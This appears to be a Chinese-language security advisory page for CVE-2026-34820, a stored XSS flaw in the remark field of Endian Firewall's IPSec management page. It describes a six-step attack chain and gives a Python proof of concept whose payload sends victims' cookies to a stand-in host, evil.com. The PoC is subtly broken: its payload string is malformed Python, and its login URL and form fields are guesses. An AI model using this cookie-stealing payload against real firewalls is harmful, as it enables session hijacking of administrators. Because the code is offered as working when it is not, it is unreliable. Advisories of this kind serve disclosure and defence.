CVE-2026-34820 CVSS 6.4 中危

CVE-2026-34820: Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34820

漏洞类型

存储型跨站脚本

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本在/manage/ipsec/接口的remark参数处存在存储型XSS漏洞。经过身份认证的攻击者可注入恶意脚本，当其他用户访问该页面时触发执行，可能导致窃取凭证或会话劫持。

技术细节

该漏洞属于存储型跨站脚本攻击。在Endian Firewall 3.3.25及更早版本中，`/manage/ipsec/` 接口用于处理IPSec连接配置，其中 `remark` 参数用于存储备注信息。由于服务器端未对该参数的输入内容进行严格的HTML实体编码或过滤，允许经过身份认证的低权限攻击者注入恶意的JavaScript代码。一旦Payload被提交，它将持久化存储在数据库或配置文件中。当管理员或其他高权限用户访问该IPSec管理页面时，被注入的脚本将在其浏览器环境中自动解析并执行。攻击者可利用此漏洞窃取管理员的Session ID、Cookie等敏感信息，进而劫持会话或执行未授权操作。

攻击链分析

STEP 1

1. 获取访问权限

攻击者使用低权限账户登录 Endian Firewall 管理界面。

STEP 2

2. 定位注入点

攻击者导航至 /manage/ipsec/ 页面，找到 remark 参数输入框。

STEP 3

3. 注入Payload

攻击者在 remark 字段中输入恶意的 JavaScript 代码并提交表单。

STEP 4

4. 持久化存储

服务器将包含恶意代码的数据存储在后端数据库或配置中。

STEP 5

5. 触发漏洞

当管理员或其他用户访问受影响的 IPSec 管理页面时，恶意脚本在受害者浏览器中执行。

STEP 6

6. 执行攻击

窃取受害者的 Cookie、Session ID 或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "https://target-endian-firewall/manage/ipsec/"

# Attacker's credentials
username = "attacker"
password = "password"

# Malicious Payload to be stored in the 'remark' parameter
payload = ""><script>alert('XSS');document.location='https://evil.com/steal?c='+document.cookie;</script>"

# Session initiation
session = requests.Session()
login_data = {"username": username, "password": password}

# 1. Login
session.post(url + "login", data=login_data)

# 2. Exploit: Send payload via the remark parameter
# (Note: Actual parameter names may vary depending on the form structure)
exploit_data = {
    "action": "save",
    "remark": payload,
    # ... other required form fields ...
}

response = session.post(url, data=exploit_data)

if response.status_code == 200:
    print("Payload injected successfully.")
else:
    print("Injection failed.")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

在官方修复补丁发布前，建议限制对 /manage/ipsec/ 接口的访问权限，仅允许可信任的内网IP访问。管理员应谨慎处理来源不明的网络请求，并定期审查系统日志以检测异常的输入数据。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表